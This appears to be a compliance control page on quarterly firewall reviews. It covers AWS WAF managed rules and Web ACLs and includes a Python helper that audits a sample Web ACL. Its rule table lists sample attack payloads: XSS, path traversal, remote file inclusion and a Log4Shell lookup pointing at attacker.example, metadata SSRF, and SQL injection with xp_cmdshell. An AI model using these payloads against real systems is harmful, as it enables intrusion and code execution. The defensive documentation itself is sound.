COM-05: Quarterly Firewall Review
Implementation of quarterly firewall review process for configuration and security assessment
Control Description
On a quarterly basis, the Company performs a review of all firewalls supporting the in-scope applications and related databases. This quarterly review includes base configuration, administrative access, monitoring, and security settings, and a change request is documented for any required changes as a result of the review.
Plain Meaning
This control requires conducting a comprehensive review of all firewall configurations every three months. The review should examine firewall rules, administrative access controls, monitoring capabilities, and security settings. Any changes needed as a result of the review must be documented through a formal change request process before implementation.

AWS WAF Managed Rules Overview
AWS WAF provides managed rule groups (AWS Managed Rules) that help protect web applications from common web exploits. AWS updates the rules automatically to address emerging threats and vulnerabilities, unless a Web ACL pins a specific rule group version. The names below are the default rule names the console assigns when a group is added to a Web ACL; the underlying rule group name is the part after the AWS- prefix, published by vendor AWS. A Web ACL can override a whole group, or individual rules inside it, to Count, which records matches without blocking; those overrides are the exceptions a quarterly review most needs to surface.
Managed Rule Descriptions
| Rule Name | Description | Primary Protection |
|---|---|---|
| AWS-AWSManagedRulesAmazonIpReputationList | Blocks requests from IP addresses that Amazon threat intelligence associates with malicious activity, including sources of bot traffic, reconnaissance scanning, and DDoS activity | IP reputation-based blocking |
| AWS-AWSManagedRulesAnonymousIpList | Blocks requests from IP addresses associated with anonymizing services (VPNs, proxies, Tor) and from hosting providers, which are commonly used to hide the true origin of malicious traffic | Anonymous proxy/VPN blocking |
| AWS-AWSManagedRulesCommonRuleSet | Protects against a broad set of common web vulnerabilities described in OWASP publications, including cross-site scripting (XSS), local and remote file inclusion, requests aimed at the EC2 instance metadata service (SSRF), oversized request components, and restricted file extensions. SQL injection is handled by the separate SQLi rule set | General web application security |
| AWS-AWSManagedRulesLinuxRuleSet | Blocks request patterns associated with exploitation of Linux-specific vulnerabilities, chiefly Linux local file inclusion (LFI) attempts that target files under /etc and /proc | Linux-specific attacks |
| AWS-AWSManagedRulesSQLiRuleSet | Focuses on SQL injection, inspecting the query string, body, cookies, and URI path for SQL syntax used to manipulate or enumerate the database | SQL injection attacks |
| AWS-AWSManagedRulesKnownBadInputsRuleSet | Blocks request patterns that are known to be invalid and associated with exploitation or discovery of vulnerabilities, such as Log4j JNDI lookup strings (Log4Shell), Java deserialization RCE payloads, a Host header of localhost, and the PROPFIND method | Malicious input patterns |
What Each Rule Blocks
| Rule | Blocks | Examples |
|---|---|---|
| Amazon IP Reputation List | • IPs on Amazon's threat intelligence list • Reconnaissance and scanning sources • Known DDoS sources | • Sources of ongoing port or vulnerability scans • Known DDoS botnet members • Hosts flagged by Amazon threat intelligence |
| Anonymous IP List | • VPN exit nodes • Proxy servers • Tor exit nodes • Hosting provider ranges | • Requests from commercial VPN services • Tor network exit points • Traffic originating from cloud or hosting providers rather than end users |
| Common Rule Set | • Cross-site scripting (XSS) • Local file inclusion / path traversal • Remote file inclusion • EC2 metadata SSRF • Oversized bodies, cookies, or query strings | • `<script>alert('xss')</script>` • `../../../etc/passwd` • `?file=http://attacker.example/shell.txt` • `http://169.254.169.254/latest/meta-data/` |
| Linux Rule Set | • Linux-specific local file inclusion • Requests targeting Linux system files | • `/etc/passwd` • `/etc/shadow` • `/proc/self/environ` |
| SQLi Rule Set | • SQL injection patterns • Database enumeration • SQL error exploitation • Union-based attacks | • `' OR 1=1--` • `UNION SELECT` • `DROP TABLE` • `EXEC xp_cmdshell` |
| Known Bad Inputs | • Log4j JNDI lookups (Log4Shell) • Java deserialization RCE payloads • Host header set to localhost • PROPFIND method • Known exploitable paths | • `${jndi:ldap://attacker.example/a}` • `Host: localhost` • `PROPFIND / HTTP/1.1` |
AWS WAF Web ACLs
A Web ACL (Web Access Control List) in AWS WAF is a central resource that defines a set of rules to inspect and control web requests to our applications. Web ACLs allow us to associate managed rule groups (like those described above), custom rules, and rate-based rules to protect our resources.
Key Features of AWS WAF Web ACLs:
- Attach to Amazon CloudFront distributions (CLOUDFRONT scope, managed from us-east-1) or to regional resources (REGIONAL scope) such as Application Load Balancers (ALB), API Gateway REST API stages, AWS AppSync GraphQL APIs, Amazon Cognito user pools, and AWS App Runner services.
- Combine multiple managed and custom rules for layered protection. Rules are evaluated in ascending priority order, and evaluation stops at the first rule whose action is Allow or Block; Count is non-terminating.
- Set the default action (Allow or Block) for requests that match no terminating rule. Count is not a valid default action; it is available only on individual rules and as an override on managed rule groups.
- Log every inspected request to CloudWatch Logs, Amazon S3, or Kinesis Data Firehose (the destination name must start with aws-waf-logs-) and review sampled requests and CloudWatch metrics per rule for audit and review.
Example: Quarterly Firewall Review with AWS WAF Web ACL
A quarterly firewall review should include:
- Reviewing every in-scope Web ACL (REGIONAL and CLOUDFRONT scopes are listed separately) and each rule it contains.
- Verifying that only necessary rules are enabled and that rule priorities are correct: because evaluation stops at the first Allow or Block, an Allow rule placed ahead of the managed rule groups bypasses them entirely.
- Ensuring that managed rule groups are current (any pinned version is deliberate, documented, and still supported by AWS) and that custom rules reflect current business requirements.
- Documenting any changes or exceptions (groups or rules overridden to Count, scope-down statements, IP set allow-lists) as part of the change management process.
Sample Checklist for Quarterly Review:
- List all Web ACLs and their associated resources (list-resources-for-web-acl for regional resources; the CloudFront distribution configuration for CLOUDFRONT-scope ACLs) and confirm every in-scope application and database endpoint is covered.
- Review each rule group (managed and custom) for relevance and effectiveness, using the period's sampled requests and per-rule metrics.
- Check for overly permissive rules or exceptions: Allow rules evaluated before the managed groups, groups or rules overridden to Count, and stale IP set entries.
- Validate that logging is enabled for every Web ACL and that the log destination is retained and monitored.
- Document findings and required changes, and raise a change request for each change before it is implemented.
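The checklist above can be run against an exported snapshot of each Web ACL rather than read off the console. The following helper is an added example for this page, not AWS code and not part of the control; it consumes the dict shape returned by boto3's wafv2.get_web_acl()["WebACL"] (the same JSON as aws wafv2 get-web-acl --name NAME --scope REGIONAL --id ID) and the LoggingConfiguration dict from wafv2.get_logging_configuration() (None when that call raises WAFNonexistentItemException), so it runs offline. The baseline set of expected managed rule groups, the sample Web ACL, its account number, ARNs and rule names are all constructed for the example; the structure also illustrates how the Web ACL features described above (priorities, terminating actions, Count overrides, default action) appear in the API.

```python
"""Offline review helper for an AWS WAF (wafv2) Web ACL snapshot (added example)."""
from __future__ import annotations

# Baseline managed rule groups the review expects on every in-scope Web ACL.
# Assumption for this example; align it with the change-managed standard.
EXPECTED_MANAGED_GROUPS = {
    "AWSManagedRulesAmazonIpReputationList",
    "AWSManagedRulesAnonymousIpList",
    "AWSManagedRulesCommonRuleSet",
    "AWSManagedRulesLinuxRuleSet",
    "AWSManagedRulesSQLiRuleSet",
    "AWSManagedRulesKnownBadInputsRuleSet",
}


def review_web_acl(web_acl: dict, logging_config: dict | None) -> list[tuple[str, str]]:
    """Return (code, detail) findings for one Web ACL, in rule evaluation order.

    WAF evaluates rules by ascending Priority and stops at the first terminating
    action (Allow or Block), so an Allow rule ahead of the managed groups bypasses
    them. A Count override keeps metrics but stops blocking; that is how most
    "exceptions" are implemented and why each one needs a documented reason.
    """
    findings: list[tuple[str, str]] = []
    seen_groups: set[str] = set()
    rules = sorted(web_acl.get("Rules", []), key=lambda r: r["Priority"])
    managed_prios = [r["Priority"] for r in rules
                     if "ManagedRuleGroupStatement" in r.get("Statement", {})]
    first_managed = min(managed_prios) if managed_prios else None

    for rule in rules:
        name, prio = rule["Name"], rule["Priority"]
        managed = rule.get("Statement", {}).get("ManagedRuleGroupStatement")
        if managed:
            seen_groups.add(managed["Name"])
            # Group-level override to Count disables blocking for the whole group.
            if "Count" in rule.get("OverrideAction", {}):
                findings.append(("GROUP_COUNT_ONLY", f"{name}: whole group overridden to Count"))
            # Per-rule overrides inside the group are the usual exception mechanism.
            for ov in managed.get("RuleActionOverrides", []):
                if "Count" in ov.get("ActionToUse", {}):
                    findings.append(("RULE_EXCEPTION", f"{name}: {ov['Name']} overridden to Count"))
            continue
        action = rule.get("Action", {})
        if "Allow" in action:
            where = "before" if first_managed is not None and prio < first_managed else "after"
            findings.append(("CUSTOM_ALLOW",
                             f"{name}: Allow at priority {prio}, evaluated {where} the managed groups"))
        elif "Count" in action:
            findings.append(("CUSTOM_COUNT", f"{name}: Count-only rule at priority {prio}"))

    for missing in sorted(EXPECTED_MANAGED_GROUPS - seen_groups):
        findings.append(("MISSING_MANAGED_GROUP", missing))
    if "Block" in web_acl.get("DefaultAction", {}):
        # Not a defect, but an allow-list posture the application owner must confirm.
        findings.append(("DEFAULT_BLOCK", "default action is Block; confirm Allow rules cover all legitimate traffic"))
    if not logging_config or not logging_config.get("LogDestinationConfigs"):
        findings.append(("LOGGING_DISABLED", "no log destination configured for this Web ACL"))
    return findings


def finding_codes(web_acl: dict, logging_config: dict | None) -> list[str]:
    """Finding codes only, convenient for asserting on a snapshot."""
    return [code for code, _ in review_web_acl(web_acl, logging_config)]


def _managed(name: str, prio: int, count_group: bool = False, count_rules: tuple = ()) -> dict:
    """Build a managed-rule-group rule entry in the get_web_acl() shape (sample data only)."""
    stmt = {"VendorName": "AWS", "Name": name}
    if count_rules:
        stmt["RuleActionOverrides"] = [{"Name": r, "ActionToUse": {"Count": {}}} for r in count_rules]
    return {"Name": f"AWS-{name}", "Priority": prio,
            "Statement": {"ManagedRuleGroupStatement": stmt},
            "OverrideAction": {"Count": {}} if count_group else {"None": {}}}


# Constructed sample Web ACL; account number, ARN and custom rule names are invented.
SAMPLE_WEB_ACL = {
    "Name": "prod-app-web-acl",
    "DefaultAction": {"Allow": {}},
    "Rules": [
        {"Name": "allow-partner-range", "Priority": 0, "Action": {"Allow": {}},
         "Statement": {"IPSetReferenceStatement": {
             "ARN": "arn:aws:wafv2:us-east-1:123456789012:regional/ipset/partner-ips/example"}}},
        _managed("AWSManagedRulesAmazonIpReputationList", 1),
        _managed("AWSManagedRulesAnonymousIpList", 2, count_group=True),
        _managed("AWSManagedRulesCommonRuleSet", 3, count_rules=("SizeRestrictions_BODY",)),
        _managed("AWSManagedRulesLinuxRuleSet", 4),
        _managed("AWSManagedRulesKnownBadInputsRuleSet", 5),
        {"Name": "rate-limit-login", "Priority": 6, "Action": {"Block": {}},
         "Statement": {"RateBasedStatement": {"Limit": 1000, "AggregateKeyType": "IP"}}},
    ],
}

if __name__ == "__main__":
    # No logging configuration passed, so the review flags that alongside the rule findings.
    for code, detail in review_web_acl(SAMPLE_WEB_ACL, None):
        print(f"{code:<22} {detail}")
```

Against the sample the helper reports the Allow rule that sits ahead of every managed group, the Anonymous IP group that has been switched to Count, the SizeRestrictions_BODY exception inside the Common Rule Set, the absent SQLi rule set, and the missing log destination; each line maps to a checklist item and, where it is not an accepted exception, to a change request. In a real run, iterate aws wafv2 list-web-acls for both scopes, fetch each ACL and its logging configuration, and attach the findings to the quarterly review record.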